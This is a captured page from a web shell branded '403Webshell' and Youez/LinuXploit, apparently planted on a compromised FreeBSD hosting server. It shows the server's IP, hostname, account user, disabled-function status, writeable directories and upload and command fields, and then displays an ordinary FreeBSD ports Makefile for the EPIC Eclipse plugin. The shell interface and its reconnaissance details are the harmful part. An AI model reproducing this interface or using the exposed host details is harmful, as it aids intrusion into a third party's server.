403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/java/eclipse-EPIC/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/java/eclipse-EPIC/Makefile
PORTNAME=	EPIC
PORTVERSION=	0.6.35
PORTREVISION=	3
CATEGORIES=	java editors devel
MASTER_SITES=	SF/e-p-i-c/e-p-i-c/${PORTNAME}%20${PORTVERSION}
PKGNAMEPREFIX=	eclipse-
DISTNAME=	${EPIC}_${PORTVERSION}_20090521

MAINTAINER=	ports@FreeBSD.org
COMMENT=	EPIC adds Perl support to the Eclipse IDE Framework
WWW=		http://e-p-i-c.sourceforge.net/

RUN_DEPENDS=	${LOCALBASE}/bin/eclipse:java/eclipse

NO_BUILD=	yes
USES=		zip:infozip
WRKSRC=		${WRKDIR}/${EPIC}

EPIC=		org.epic.updatesite
ECLIPSE=	${PREFIX}/lib/eclipse
EPICFILES=	features/org.epic.feature.main_${PORTVERSION} \
		plugins/org.epic.debug_0.6.27 \
		plugins/org.epic.doc_0.6.2 \
		plugins/org.epic.lib_0.6.1 \
		plugins/org.epic.perleditor_0.6.24 \
		plugins/org.epic.regexp_0.6.1 \
		plugins/org.epic.source_${PORTVERSION}

post-extract:
.for file in ${EPICFILES}
	cd ${WRKSRC} \
	  && ${MKDIR} ${file} \
	  && ${UNZIP_CMD} ${file}.jar -d ${file}
.endfor

do-install:
	cd ${WRKSRC} && ${COPYTREE_SHARE} "${EPICFILES}" ${STAGEDIR}${ECLIPSE}

post-install:
.for file in ${EPICFILES}
	@${FIND} ${WRKSRC}/${file} -type f \
	  | ${SED} -ne 's,^${WRKSRC},${ECLIPSE:S,^${PREFIX}/,,},p' >> ${TMPPLIST}
	@${FIND} -d ${WRKSRC}/${file} -type d -empty \
	  | ${SED} -ne 's,^${WRKSRC},@dir ${ECLIPSE:S,^${PREFIX}/,,},p' >> ${TMPPLIST}
.endfor

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit